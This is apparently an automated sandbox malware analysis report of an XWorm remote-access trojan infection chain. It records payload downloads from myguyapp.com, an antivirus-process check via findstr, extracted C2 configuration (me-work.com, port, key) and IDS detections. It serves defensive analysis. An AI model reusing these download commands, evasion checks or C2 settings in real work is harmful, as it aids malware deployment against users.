Source: Process started; Author: Joe Security; Data: Command: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth", CommandLine|base64offset|contains: ~), Image: C:\Windows\SysWOW64\findstr.exe, NewProcessName: C:\Windows\SysWOW64\findstr.exe, OriginalFileName: C:\Windows\SysWOW64\findstr.exe, ParentCommandLine: "C:\Windows\System32\cmd.exe" /c copy Phpbb Phpbb.bat & Phpbb.bat, ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 8932, ParentProcessName: cmd.exe, ProcessCommandLine: findstr -I "avastui avgui bdservicehost nswscsvc sophoshealth", ProcessId: 9036, ProcessName: findstr.exe

Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol
2024-12-12T19:10:45.764994+0100 | 2852870 | 1 | Malware Command and Control Activity Detected | 193.26.115.21 | 7007 | 192.168.2.8 | 49728 | TCP
2024-12-12T19:10:45.764994+0100 | 2852874 | 1 | Malware Command and Control Activity Detected | 193.26.115.21 | 7007 | 192.168.2.8 | 49728 | TCP
2024-12-12T19:10:36.041153+0100 | 2855924 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49728 | 193.26.115.21 | 7007 | TCP

              AV Detection

              barindex
              Source: https://myguyapp.com/msword.zipAvira URL Cloud: Label: malware
              Source: 0000001D.00000003.3345618288.00000000038E0000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Xworm {"C2 url": ["me-work.com"], "Port": 7007, "Aes key": "<123456789>", "SPL": "<Xwormmm>", "Install file": "USB.exe", "Version": "XWorm V3.1"}
              Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.6% probability
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: me-work.com
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: 7007
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: <123456789>
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: <Xwormmm>
              Source: 29.3.Carter.pif.38bceb0.0.raw.unpackString decryptor: USB.exe
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49708 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49710 version: TLS 1.2
              Source: unknownHTTPS traffic detected: 193.26.115.21:443 -> 192.168.2.8:49713 version: TLS 1.2
              Source: Binary string: RegAsm.pdb source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp
              Source: Binary string: RegAsm.pdb4 source: RegAsm.exe, 00000029.00000000.3291795440.0000000000C72000.00000002.00000001.01000000.00000012.sdmp
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_004062D5 FindFirstFileW,FindClose,14_2_004062D5
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_00402E18 FindFirstFileW,14_2_00402E18
              Source: C:\Users\user\AppData\Local\Temp\msword\msword.exe | Code function: 14_2_00406C9B DeleteFileW,lstrcatW,lstrcatW,lstrcatW,lstrlenW,FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,14_2_00406C9B
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D4005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D4005
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D494A GetFileAttributesW,FindFirstFileW,FindClose,29_2_002D494A
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002D3CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,29_2_002D3CE2
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002DC2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DC2FF
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002DCD14 FindFirstFileW,FindClose,29_2_002DCD14
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002DCD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,29_2_002DCD9F
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002DF5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF5D8
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002DF735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,29_2_002DF735
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002DFA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,29_2_002DFA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00944005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00944005
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0094C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094C2FF
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0094494A GetFileAttributesW,FindFirstFileW,FindClose,37_2_0094494A
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0094CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,37_2_0094CD9F
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0094CD14 FindFirstFileW,FindClose,37_2_0094CD14
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0094F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F5D8
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0094F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,37_2_0094F735
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_0094FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,37_2_0094FA36
              Source: C:\Users\user\AppData\Local\CloudSynergy Solutions\DanielPulse.scr | Code function: 37_2_00943CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,37_2_00943CE2
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\
              Source: C:\Windows\SysWOW64\cmd.exe | File opened: C:\Users\user\AppData\Local\Temp\msword

              Networking

              Source: Network traffic | Suricata IDS: 2855924 - Severity 1 - ETPRO MALWARE Win32/XWorm V3 CnC Command - PING Outbound : 192.168.2.8:49728 -> 193.26.115.21:7007
              Source: Network traffic | Suricata IDS: 2852870 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC Checkin - Generic Prefix Bytes : 193.26.115.21:7007 -> 192.168.2.8:49728
              Source: Network traffic | Suricata IDS: 2852874 - Severity 1 - ETPRO MALWARE Win32/XWorm CnC PING Command Inbound M2 : 193.26.115.21:7007 -> 192.168.2.8:49728
              Source: Malware configuration extractor | URLs: me-work.com
              Source: Yara match | File source: 29.3.Carter.pif.38bceb0.0.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 29.3.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: Yara match | File source: 29.2.Carter.pif.38bceb0.1.raw.unpack, type: UNPACKEDPE
              Source: global traffic | TCP traffic: 192.168.2.8:49728 -> 193.26.115.21:7007
              Source: Joe Sandbox View | ASN Name: QUICKPACKETUS QUICKPACKETUS
              Source: Joe Sandbox View | JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
              Source: Joe Sandbox View | JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global traffic | HTTP traffic detected: GET /c.bat HTTP/1.1 Accept: */* Accept-Language: en-CH Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: myguyapp.com Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /f.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /msword.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
              Source: C:\Users\user\AppData\Local\Temp\220239\Carter.pif | Code function: 29_2_002E29BA InternetReadFile,InternetQueryDataAvailable,InternetReadFile,29_2_002E29BA
              Source: global traffic | HTTP traffic detected: GET /c.bat HTTP/1.1 Accept: */* Accept-Language: en-CH Accept-Encoding: gzip, deflate User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729) Host: myguyapp.com Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /f.pdf HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
              Source: global traffic | HTTP traffic detected: GET /msword.zip HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682 Host: myguyapp.com Connection: Keep-Alive
              Source: global traffic | DNS traffic detected: DNS query: myguyapp.com
              Source: global traffic | DNS traffic detected: DNS query: x1.i.lencr.org
              Source: global traffic | DNS traffic detected: DNS query: dwLscOsEZmpbOxr.dwLscOsEZmpbOxr
              Source: global traffic | DNS traffic detected: DNS query: me-work.com
              Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
              Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
              Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
              Source: msword.exe.13.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://crl.globalsign.com/gs/gstimestampingsha2g2.crl0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://crl.globalsign.com/gscodesignsha2g3.crl0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://crl.globalsign.com/root-r3.crl0c
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://crl.globalsign.net/root-r3.crl0
              Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
              Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
              Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
              Source: msword.exe.13.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
              Source: msword.exe.13.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
              Source: 77EC63BDA74BD0D0E0426DC8F80085060.8.dr | String found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
              Source: msword.exe, 0000000E.00000002.1969169410.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe, 0000000E.00000000.1903617710.0000000000408000.00000002.00000001.01000000.0000000C.sdmp, msword.exe.13.dr | String found in binary or memory: http://nsis.sf.net/NSIS_ErrorError
              Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0
              Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0A
              Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0C
              Source: msword.exe.13.dr | String found in binary or memory: http://ocsp.digicert.com0X
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://ocsp2.globalsign.com/gscodesignsha2g30V
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://ocsp2.globalsign.com/gstimestampingsha2g20
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, msword.exe, 0000000E.00000002.1969278177.000000000041F000.00000004.00000001.01000000.0000000C.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://ocsp2.globalsign.com/rootr306
              Source: RegAsm.exe, 00000029.00000002.3852880211.00000000030A1000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gscodesignsha2g3ocsp.crt08
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852773681.000000000385F000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345958034.0000000003854000.00000004.00000800.00020000.00000000.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://secure.globalsign.com/cacert/gstimestampingsha2g2.crt0
              Source: msword.exe, 0000000E.00000003.1913133669.0000000002A6C000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1952206018.0000000003AFA000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3850451587.0000000000339000.00000002.00000001.01000000.0000000F.sdmp, DanielPulse.scr, 00000025.00000002.2002506530.00000000009A9000.00000002.00000001.01000000.00000011.sdmp, Missouri.14.dr, Carter.pif.20.dr | String found in binary or memory: http://www.autoitscript.com/autoit3/J
              Source: msword.exe.13.dr | String found in binary or memory: http://www.digicert.com/CPS0
              Source: 2D85F72862B55C4EADD9E66E06947F3D0.8.dr | String found in binary or memory: http://x1.i.lencr.org/
              Source: mshta.exe, 00000000.00000003.1914069158.000000000A725000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1917190543.000000000A726000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915262349.000000000A726000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1919817498.000000000A726000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1904929361.000000000A721000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com
              Source: RegAsm.exe, 00000029.00000002.3851904482.00000000014EB000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.c
              Source: mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926535465.000000000302B000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926563616.0000000003034000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926304834.000000000302B000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/
              Source: mshta.exe, mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918050924.000000000306A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918106390.0000000003095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1913738105.0000000003069000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1917050251.0000000003066000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915166385.0000000003095000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1917711864.0000000003022000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915597360.000000000305F000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1917908255.0000000003066000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915866523.000000000306A000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1916638287.000000000A437000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1915798353.0000000003022000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1913738105.0000000003095000.00000004.00000020.00020000.00000000.sdmp, c2.hta | String found in binary or memory: https://myguyapp.com/c.bat
              Source: mshta.exe, 00000000.00000003.1904868317.00000000030B7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000003.1911664229.00000000030BA000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000000.00000002.1918202478.00000000030BC000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/c.batE&
              Source: mshta.exe, 00000000.00000003.1916638287.000000000A437000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/c.batU
              Source: cmd.exe, 00000022.00000002.1955529003.0000000003180000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.00000000014EB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.0000000001442000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851243617.00000000012D0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3851607256.00000000013C0000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000029.00000002.3854974817.00000000066E0000.00000004.00000020.00020000.00000000.sdmp, c[1].bat.0.dr | String found in binary or memory: https://myguyapp.com/f.pdf
              Source: Carter.pif, 0000001D.00000002.3851285686.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdf-
              Source: tasklist.exe, 00000016.00000003.1926304834.0000000003010000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000003.1926192131.000000000300E000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000016.00000002.1927182501.0000000003012000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdf6C
              Source: RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdf:
              Source: tasklist.exe, 00000018.00000002.1939808074.0000000003392000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1938952585.000000000338D000.00000004.00000020.00020000.00000000.sdmp, tasklist.exe, 00000018.00000003.1939094485.000000000338F000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfI
              Source: RegAsm.exe, 00000029.00000002.3851243617.00000000012D0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user
              Source: Carter.pif, 0000001D.00000002.3851285686.0000000000C58000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSER
              Source: Carter.pif, 0000001D.00000003.3345732734.0000000003890000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000002.3852824301.00000000038BC000.00000004.00000800.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3345997131.00000000038B2000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=h
              Source: Carter.pif, 0000001D.00000003.1956168658.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1958820612.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955633417.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291958628.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953710429.0000000000585000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1956408269.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954557812.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955333455.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953745957.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953628491.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1953575017.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291998783.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1955168928.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.3291894384.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954636307.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954125310.0000000000584000.00000004.00000020.00020000.00000000.sdmp, Carter.pif, 0000001D.00000003.1954495939.0000000000584000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfUSERDOMAIN=CURQNKVUSERDOMAIN_ROAMINGPROFILE=user-PCUSERNAME=userUSERPR
              Source: RegAsm.exe, 00000029.00000002.3851904482.0000000001408000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfW
              Source: tasklist.exe, 00000018.00000002.1939736709.0000000003378000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfl
              Source: msword.exe, 0000000E.00000002.1969463085.000000000051A000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/f.pdfq
              Source: tasklist.exe, 00000016.00000002.1927426307.00000000031B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://myguyapp.com/mswor
